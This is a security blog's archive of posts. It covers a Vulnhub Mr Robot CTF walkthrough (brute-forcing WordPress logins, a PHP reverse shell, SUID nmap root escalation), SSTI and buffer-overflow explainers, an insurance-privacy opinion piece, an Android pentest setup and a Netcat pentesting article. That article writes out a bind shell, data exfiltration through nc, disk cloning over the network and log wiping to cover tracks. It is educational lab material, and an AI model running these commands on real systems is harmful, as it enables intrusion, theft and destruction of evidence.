Thursday, October 25, 2018

Vulnhub: Mr Robot



Hello there, I'm here again with another great vulnhub machine.
This time we'll learn a few basic techniques with the nostalgic Mr Robot Vulnhub machine!

If you would like to see the POC video watch it below. If you don't like spoilers too fast, read on.




Overview: Methodology

The steps to compromise this machine were simple: I started with enumerating directories and services. By using directory fuzzing, we obtained the 1st key as well as a dictionary file which was used to bruteforce passwords. After enumerating and bruteforcing our access to the web application, we obtained access by uploading a reverse shell and accessing our 2nd key for this challenge. Lastly, I proceeded with the privilege escalation phase to obtain the last key.

Set-up: VM Network Settings and IP Assignment

We go to the site and download the image. Verify the checksum and proceed to importing it to our Virtual software of choice. For this exercise, I've used VirtualBox, but you can use any as long they support the .ova extension.

After setting our VM Network Settings to Bridge, we conduct an ifconfig to determine what our network IP/Range is and then we scan our network by range to find the VM with: netdiscover -r [ip/subnet]



Reconnaissance: enumerating and scanning

Once we have the IP Address of our VM, we proceed with the enumeration so we use a few tools for this:

nmap: enumerate ports (80, 443 found to be open)


nikto: look for misconfiguration and low hanging fruits, compromising dirs


dirbuster: maps directories containing juicy data/admin portals, etc.


After looking at nikto and dirbuster results, we don't only found out the server's Wordpress site version but also the admin portal located in: /wp-login.php:





After looking at the robots.txt file, we find our 1st key along with a dictionary file to download:







Looking at the dictionary file, we can see that there are duplicate entries, so we open it with Sublime Text -> Edit -> Permute Lines -> Unique and we obtain a fresh non-duplicate copy. We save it as a new file and proceed with enumerating usernames. Easy process, moving along...

In the /wp-login.php page, we grab the login post parameters with Burp Suite and proceed to brute-force the username with Hydra:


hydra -L [location-of-dictionary-file] -p unknownPassword [ip-address] http-form-post "/wp-login.php:log=^USER^&^pwd=^PASS^:invalid"



We can see that the same username has been found but case sensitive: elliot, Elliot and ELLIOT.

Now that we know the username, we can use wpscan to bruteforce the password with the unique dictionary file we downloaded from the robots.txt file:

sudo wpscan --url 192.168.2.10 --wordlist /home/vicio/Labs/Vulnhubs/MrRobot/fsocity_unique.dic --username ELLIOT


We can see the password obtained for the elliot, ELLIOT or Elliot username.


Access: Using credentials and obtain reverse shell

We enter the credentials obtained with Hydra and WPScan to the WP Portal:





We then navigate to the "Appearance" -> Editor Section and in the right-hand sidebar, we click on the 404 Template. From here, we can upload our own or a custom PHP reverse shell to gain access to the box.  I used the PentestMonkey's reverse shell and changed the settings to fit my needs (IP and port number):



Now, the only thing we need to do is to set up a listener to our machine (in this case on 192.168.2.8 on port 7777) and navigate a non-existing page in Wordpress and we'll get shell access.



We can now spawn a bash shell with Python and proceed to read our next key:


As you can see, even though we obtained access to the box, we still need to access as "robot", the regular user to read its key.  We can see the hashed key but not the key-2-of-3.txt file. As the file name states, the file in which the credentials are stored (robot:c3fcd3d76192....) contains a MD5 password, which needs to be cracked. Our fastest way is to see if it has been cracked already and publicly disclosed in the Crack Station website.


Password has been cracked before so now we have to copy and paste it in our shell to get user access:



Post Exploitation: Privilege Escalation

From here, we do a search for the entire system (find /) for SUID permissions (-perm /u=s) and discard any error messages (stderr) (2>/dev/null) to clean our results.


Here, we can see that nmap has its permissions to be accessed with a regular user, in this case robot user. When we check for its version, it shows 3.81.


By doing a little research on this version, we can see not only that it's outdated but also that interactive mode is enabled on it since it was later removed due to performance issues. We give it a go and sure it executes. We try help and we find the ability to execute commands as root. Please, tell me you're seeing this too!


From here, it's a walk in the park. We just concatenate the key file contents within /root/ and to obtain our last key:


I hope you enjoyed this easy but creative Vulnhub. I might do a POC video later with Mr Robot soundtrack!

!

Sunday, August 12, 2018

Sunday, August 5, 2018

VulnHub: Bulldog I

Hey guys, I've been pretty busy but I recompiled a video about this pretty easy VulnHub. I hope you enjoy it.




To make it instructional, it's important to note the following main vulnerabilities in the server:

1. Hashes revealed in source code
2. Easy hashes to guess (already in online database)
3. Webshell prone to OS command execution, allowing reverse shell
4. Master password burried in Binary
5. Allowing sign ins from any location


MORAL:

Never, never, NEVER assume that other people won't find the trails you leave for other developers to find (due to your laziness and malpractices).


Have fun and happy hacking!

Thursday, March 29, 2018

OWASP TOP 10: SSTI

This time we'll talk a little about server-side template injection (SSTI) attacks, when they occur and what to do to mitigate the risk.


Overview

As any other type of injection, SSTI is on the top of the OWASP list threatening web applications in a daily basis.  SSTI is abused when directives are injected to a user input which is unsafely embedded to a template. The effect can be catastrophic, especially when remote code execution (RCE) is possible.

POC
In the following short video, we can see how a server-side template injection occurs in a Flask with Jinja template engine. The POC is made inside of a CTF challenge so only the flag is shown and no RCE is allowed. In real-life systems, other data may be exposed which would endanger the company's assets.

 

Mitigation
The risk of accepting template directives causing a server-side template injection attack can be mitigated by rendering templates within a sandbox environment, protect user input fields by preventing the creation of templates from them and checking the documentation of the template engine for specific patches/advise in how to harden that engine.


Sources:
https://nvisium.com/resources/blog/2015/12/07/injecting-flask.html
https://portswigger.net/kb/issues/00101080_server-side-template-injection 
http://flask.pocoo.org/docs/0.12/templating/
       

Tuesday, March 27, 2018

Binary Exploitation Basics - Int Limits & Buffer Overflow

It's been a while. I've been practicing and delving more into the CTF world. Hacking capture the flag events help you not only to understand different areas in cyber security but also to think outside of the box. Lately, I've been blessed to find some easy CTFs to understand basics of binary exploitation; a subject that can be cumbersome for many, including myself.  I hope that, with this video Blog, you can understand the very basics of C integer limits and buffer overflow residing in the gets function of a C program.

Let's start.

Binary 1: C Integer Range Limitations

In the first program, accumulator.c, we are looking at an int variable ('n') being assigned to user's input, but it only allows us to have access to the (secret) flag if the variable is negative.  The problem is that it doesn't let us enter negative values.  If we enter a "too high" value, it also fails to give us the flag.

The secret I found here was to understand the limits of signed integers in a C program. As you can see in the table below, the maximum range in which an signed integer can go is 2147483647. If we enter that value, and then add one to it, the variable will go out of range causing the program to give us the minimum value of int, which is –2147483647 –1 and that will be placed into the variable giving us the flag.







Binary 2: Buffer Overflow in 'gets()' function

In this challenge we have to use a disassembler (such as gdb or objdump) to see which functions are used in the program to give/retrieve data. After a little time examining the main() function, we can see that the C program is retrieving data using the gets() function instead of fgets(). By doing a little Google search, it appears to be a common issue which leads to a buffer overflow.

By running a one liner in python we are overflowing the buffer with 500 A's, causing a segmentation fault; and because gets() does not check for bounds in the buffer, it simply gives us all the data available in the array, including the flag.


There is a simple fix for this. By using fgets() to read data, instead of gets().

I hope you enjoyed this video and learned a few things just like I did. Cheers!




Thursday, March 9, 2017

Automobile Insurance and The Hidden Price of RightTrack(ing you)

Nowadays, insurance companies are using several strategies to charge for premiums in more oppressive ways because they think they're losing money in the process. One of those methods is "usage based insurance" which consists in pushing customers to try their "discount" plan of plugging a device called RightTrack into their OBD-II port of their car monitoring the behavior of your driving, thus giving you discount based on how you drive and now by your age, gender or credit history. They promise the sun and moon and they paint the scenario that you're missing out if you don't try it. Upon receiving the device, customers should keep it plugged in to monitor their "safe" (unsafe) driving and after 90 days, they should return the device by pre-paid mail and receive a discount up to 30%.

But believe it or not, Usage Based Insurance (UBI) is not a new animal but instead it has about 10 years old. It started with Progressive Insurance Co with the help of GMAC (General Motors Assurance Co.) and they used GPS combined with cellular technology to track not only where you went, how much you drove and how fast. With time, they became the leaders who pushed other companies to do the same thus calling these services (PAYD) Pay-As-You-Drive, (PHYD) Pay-How-You-Drive and PAYG (Pay-As-You-Go).

Benefits

I had a discussion with my insurance company and even though they told me that the plan was "optional" it was better for me to opt-in since it could save me as low as 5% of my insurance bill if I was considered a terrible driver. So if the benefit is too great to believe, what's the catch? She also told me that the device "doesn't track you", however I should not be concerned about privacy and that "everyone's using it" so I should try it as well.  Now, my question is: if it's that great, why not making it mandatory? For now, this is optional but it's a catchy one because if you chose not to, you're not getting discount. 

Another benefit of using UBI devices is that it will single you out if you're one of those exempt teenagers who really drive safely. It also obtains a more precise reading versus having to rely on previous history of accidents. But always remember they give you up to a 30% discount, perhaps not a whole lot to save.
  

What they DON'T Tell You

As we all know, insurance companies don't offer this "discount" because they're nice to you or because you have been driving safe, but because they want to rise their premiums by tracking and reporting every sensor such as the breaking system, accelerometer, odometer, whether it's dark outside or not, how sharp your turns are as well as how hard you hit that break pedal and how often (even when someone cuts you off). The part they don't tell you is that even though this product/service is "free" (as of free beer), it's not free from Big Data companies to gather as much information (metadata) about you and how you drive (driving habits). This can and will be used not only to predict when you'll have a car crash but also whether to insure you further or not and how much they can charge you in a matter of time. This also helps your insurance company to estimate and charge you over time more expensive premiums if you drive longer distances (faster speed) vs short distances (slower speed). So for example, if you drive to visit your parents every weekend and they're far from you, they will find that pattern over time and rise your premiums because nobody drives slow in long distances. 

Let's consider the "no tracking" statement is true for my insurance company because it's totally irrelevant to how they can charge me, they still can track the metadata. Let's consider it as metadata on your phone call as an example; which is the duration of the call (drive), speed, time and how often by applying mathematical formulas to determine how much to charge you overtime. Even though my insurance company claimed they do not track their customers, this does not apply to all companies. Let's consider some of these devices have telemetry via GPS and/or mobile signal locators. How safe would you be if someone does not use a good ethical procedure and checks what you do just because the possibility is there or for sadistic fun? Now, let's pretend we live in a perfect world and nobody spies on nobody or because nobody cares whether you go or whether you visit your family or cheating on your spouse, this doesn't mean insurance companies, will use metadata information to hurt you when they present you with your irrefutable driving habits.

What to Do

For now, this program is optional even though they are now trying to bundle it with theft recovery and road assistance plans. It will be up to the people if they demand it or not whether they will make it mandatory. It is up to you to outweigh the risks of having your actions judged by a computer screen in which you can't escape or doing it the old-school way and pay a few dollars more each month for exchange of good privacy.


Sources:

Usage Based Insurance and Telematics:
http://www.naic.org/cipr_topics/topic_usage_based_insurance.htm

Lower Your Car Insurance Bill, at the Price of Some Privacy:  
https://www.nytimes.com/2014/08/16/your-money/auto-insurance/tracking-gadgets-could-lower-your-car-insurance-at-the-price-of-some-privacy.html?_r=0

Wednesday, March 1, 2017

Mobile Pentesting with Android - Part 1 - Set-Up

Nowadays it seems people like to do "everything" on their daily lives over their phone, avoiding the use of laptops and even less desktops.  For this reason, cyber crime is shifting to a new paradigm and that is, going after mobile users infecting them with malware, stealing their credentials and even listening to their phone calls with fake apps which gives you a little more than what it promises.

Aside the whole discussion of "how can I be safer with my phone", I thought it would be better skipping that rhetoric boring subject and delve more into "how to spot if my app is actually secure" by conducting common sense and various assessments to it.  First I will go into the basics in how to determine if your app is as secure as it says and then set up an emulator so you can test them before installing them into your phone. We will change the connection settings so the connection routes to a local proxy so we can see if it transmits securely into our device.

You can also conduct other assessments but it's up to you if you decide to to break the law or not. I suggest you not to, so as a proof of concept I will use a purposely vulnerable Android app called DIVA (Damn Insecure and Vulnerable App). Ultimately, it's your duty to be responsible with the apps you use, how much and what type of information you share over the Intenret and TO INVESTIGATE AND TEST them in order to determine if it's a good trade-off for you to install and use them.

To start, I will show you how to determine what kind of information you give out before installing an application. You can also check this on an already installed application you already have on your mobile.  

In the following screenshot you can see Facebook's permissions and how to access them. 



Under "permission details" it specifies which kind of sensor activates on the phone on behalf of the installed app.  So after we see what we give out, we face the dilemma of having certain privacy traded off with the pleasure of using the app.

Now, I will show how to set up a phone emulator so you can install the application you want and test it however you please. You can also use the proxy connection steps on your own (physical) phone after you connect to your home wi-fi but I won't recommend so, since I wouldn't mix my personal phone for testing applications.

There are plenty of emulators on-line to test from but the one I highly recommend because it's easy to set-up and use, is Genymotion for Personal Use which will also help you to install the Android image you want. You can also install .apk files on the fly by using drag-drop which makes it extremely easy.

After installing it, in order for Genymotion to work, we also have to install Virtual Box.
 

Once Genymotion and Virtual Box are installed, you need to fire up Genymotion and set up the Proxy in order to use it with Burp Suite and test for vulnerabilities. But first, let's go over Genymotion's settings:

Going from back to front, leave the Misc tab as default as it is only for selecting the folder you want for screen captures. You can also opt out from Genymotion to collect usage statistics.

In the ADB tab, if you haven't installed any SDK tools package (you don't have to), use the default option. If you did so, select the folder where your SDK tools reside in.

For the "Virtual Box" tab, ensure the path is the correct one for the Virtual Devices (it's already set-up by default).

Also leave the "Network" tab blank as we set up the proxy later. For the "Account" tab, there is nothing to change/review.

For the Virtual Box Configuration, you only need to review and change (if applicable) the Network settings.

The adapter 1 should be "host only" to connect from Virtual Box to Genymotion:

The adapter 2, we should select NAT in order to use our local IP address to use with Burp Suite:




Ensure "Enable Network Adapter" in both Adapter 1 and 2 are checked. This is a common problem I have overlooked more than once.

Now, we fire up the image on Genymotion and wait until our Android image starts. You can check VirtualBox on a side to verify everything went fine. You can see the image loaded. Mine's a custom one so it might look different if you chose another Android image but it shouldn't matter.



 Finally, we set-up our proxy so we can connect to our application through Burp Suite.

The easiest way to do this is to go to Settings -> Select WiFi Network -> Hold Click on WiredSSID (network's name) and select on "modify network".


By clicking on "Show advanced options" and select "Manual" on Proxy, we input the same IP of our local machine and type port 8082 or whatever unused port of your like.


Leave the "Bypass proxy for" and "IP settings" as is and click on "Save".

Now, fire up Burp Suite and create a new blank project (temporary project). Select the defaults and wait until it completely loads.

Going to the Proxy -> Options tabs, deselect the default one (127.0.0.1:8080) and create a new proxy listener with port 8082 (or whatever port you entered on your Android wifi proxy settings) and select "all interfaces":

Click OK and Yes when it asks if you want to listen to all interfaces.

Now, in Burp Suite, go to "Intercept" (under Proxy tab) and test the connection by going on Genymotion's web browser. If it doesn't automatically go to google.com go ahead and type google.com and press enter. Burp Suite should now intercept the packet before the page loads.



And this concludes the set-up process. On the next topic, I will guide you into installing .apk and use DIVA so you can start learning/practicing your pentesting skills with no constraints or legal troubles. 

Have a good week and stay safe!

Thursday, July 14, 2016

Mr Robot Season 2 Easter Eggs: Ransomware Message Revealed and Decoded!

Hello folks!  I'm sure you have heard about the most popular TV Show of 2015 and perhaps of 2016, multiple awards winning TV sensation of Mr Robot.  I don't like TV shows and don't watch TV at all, but I got caught with Season 1 because of the hacking techniques the main character uses which sound and seem pretty legitimate (as well as the terms).  So, Season 2 took off yesterday but there has been a lot of work done on the Internet about it before then not only on their website, but also outside of it;  including Easter eggs!  Easter eggs are "secrets" buried in layers for people to find out.  I have stumbled to a few great surprises but one was worth noting.  After they released Episode 1 before the air-date, kept me wondering...

Episode 1 concludes in a Ransomware attack to evil corp banks which leaves their computer inoperable.  I could take a screenshot of it and decided to investigate the victim's IP address (which is public by the way) and found something interesting.  There seemed to be a message buried behind the timer which resets every-time you open the website, but what if I could stop the timer and let it go to 00:00:00? What would happen when the timer sets to 0?  Watch the video, learn a little about JS and base64 encoding (where the message is buried), grab some pop-corn and enjoy the video.... Dubtstep style!


How Can a 10 Year Old Have Administrator Access to Your Fortified Windows 8 and 10 Computer

Hello there. I have been a bit busy working and on-side projects so I would like to share with you some old work I have done before which I haven't shared on my Blog.  Even though I have done a similar video with Windows 7.  This shows that the principle of this flaw does not rely on software but in the design of it.  Since Micro$oft is too busy fixing more "relevant" bugs, I am posting this only for educational purposes.  I am not responsible nor condone illegal acts.


Now, watch and enjoy!

Windows 8:




Windows 10:


Wednesday, April 20, 2016

Old-school Pentesting with Netcat


I have been asked to write an article for PentestMag and here it is. Enjoy it

Netcat has been created by “Hobbit” and its first stable released was in 2007. We all know Netcat’s legendary remark for being the “Swiss army knife” for pentesting, but do we really know everything about it? We all have used Netcat for one thing or another, but the truth is that with Netcat can be used for a plethora of things!

If you had to do some sort of security certifications or simply done some cyber-security courses, you will come across up with the famous phases of “hacking”:



1. Reconnaissance

2. Scanning

3. Gaining Access

4. Maintaining Access

5. Covering Tracks

We all have used Netcat to do any of these functions in many ways. We even tried to make a chat client and perhaps even transferred files over a network; but did we ever used Netcat at its fullest and at every phase of Pentesting? Let’s check:


Step 1: Reconnaissance

We can perform banner grabbing in order to determine the web server type and version they have as well as any other service’s version. Sure, we can do this with Telnet, but Netcat does not alter the stream of data and supports TCP as well as UDP unlike Telnet. The command for Netcat banner grabbing is the following:



nc [IP address] [port number]



A practical example would be:



Please, note that is very useful to use this method because it tells us not only the web application’s server but also its version which you might want to consider skipping step 2.


You can also trying to enter HEAD / OPTIONS for get some response header stating scripting language which the web server is primarily written on (in this case PHP):




If we try the same syntax by changing the port number, we will get interesting results if the ports are opened:




Step 2: Scanning



If we try to scan for specific ports in order to find potential sensitive information through outdated software and/or web application versions on the server we can use the following command:


nc –vv –n –z –w1 [IP-address] [port number range]



In the screenshot we can see a clear example:



This is what every flag does: 


-vv: display more verbose message of the output.

-n: run the scan without resolving hostname.

-z: run the scan without sending any data to the target system.

-w1: wait no more than 1 sec to make each request.

IP address: IP Address of the host we want to scan

Port Numbers: A range can be used as well as skip individual ports separated by commas.

With this method, we can simply figure out what ports are being opened and which are closed by looking at the connection status (closed/open). If you would like more information about a certain port, you can try the banner grabbing technique to figure out what the version is.



Step 3: Gaining Access

How good is to have the whole system infrastructure layout and ‑knowing they are using an out of date version of a software as well as knowing it’s vulnerable if we can’t show the evidence by gaining access to the system? One very common way for Netcat to have access to a system is to send a crafted file which remotely creates a Netcat listener inbound connection to a given port back to the attacker. Note that the target system also has to have Netcat installed to accomplish this but this can be accomplished by:



1) Social Engineering the victim into installing it.

2) By performing phishing.

3) Physical access to the system.


Then, after the connection is being made, the attacker can easily connect to the listening port and IP of the target machine and remote execute code on his behalf. The snippet is as easy as this:


(Target’s machine)

nc –l –p [listening port] –v –e /bin/bash


 (Pentester’s machine)

nc [Target IP] [listening port]



Besides performing a bind shell to the client, you can also use Netcat to perform a reverse shell in case you want to proceed which is useful while performing in a NATed system. Unlike ports, reverse shell assigns a connection to the user (attacker) through a shell. Note: To attack the target’s machine which is behind a NAT, port-forwarding must be set up on the target’s machine IP and port.




Step 4: Maintaining Access

Netcat also has great functionalities which allows you to create backdoors in order to come back later to the system. We have seen how to create a listener thus creating the chance of having a backdoor to remote execute as well as retrieving files from the target machine; but how about copying files or exfiltrate data?

For this test, we used corporate_secrets.txt as the file we think the target machine has. To copy from the target’s machine to the Pentester’s machine, simply do the following:

(in target’s machine)

cat [file_to_exfiltritate]| nc [IP of Pentester] [Port]



(in Pentester’s machine)

nc –n –vv –p 1337 > [file_to_exfiltrate]



Visual Example:



Also copying files to the target’s system is possible:

(Target’s machine)

nc –lp 1337 > [file]



(Pentester’s machine)

nc [IP of target] < [file]



Visual Example :



Step 5: Covering Tracks



We know that every successful hack is not successful if we leave tracks all over the place. For this case, we can even delete logs by echoing to a blank space to the file or overwriting it with a chunk data or even copying over a fake log file overwriting it on the target system.



echo “ “ > log.txt


nc [victim IP] [port number] > log file.


Tips and Tricks



Chat Client



In one terminal, type:

nc –vlp 1337



In the other terminal type:

nc [IP of 1st terminal] 1337

Start typing



Visual Example:




Send spoofed HTTP Requests



nc [domain.com] 80



GET / HTTP/1.1

Host: domain.com

User-Agent: Who-Cares

Referrer: Noone.com

[Press Enter twice]



Visual Example:



Make an instant Web Server with Netcat


while true; do nc –lp 80 –q 1 < test.html; done



Visual Example:



Cloning Hard Drive Partitions over the network



dd if=/dev/sda | nc [IP address] 1337



Conclusion:


Netcat is more than simply a tool. The phase of hacking and penetration testing is simple but with Netcat it can be used and seen much simpler than what it really is. Netcat is been in the Pentesting industry for decades, but this article helps you to keep in touch with old and still reliable ways of taking over systems. It is true that with the help of Metasploit and the Meterpreter it is also possible to create backdoors and do more post-exploitation techniques but it is beyond this scope of this article. The purpose of it was to clarify that Netcat is still great and simple to do all phases of hacking.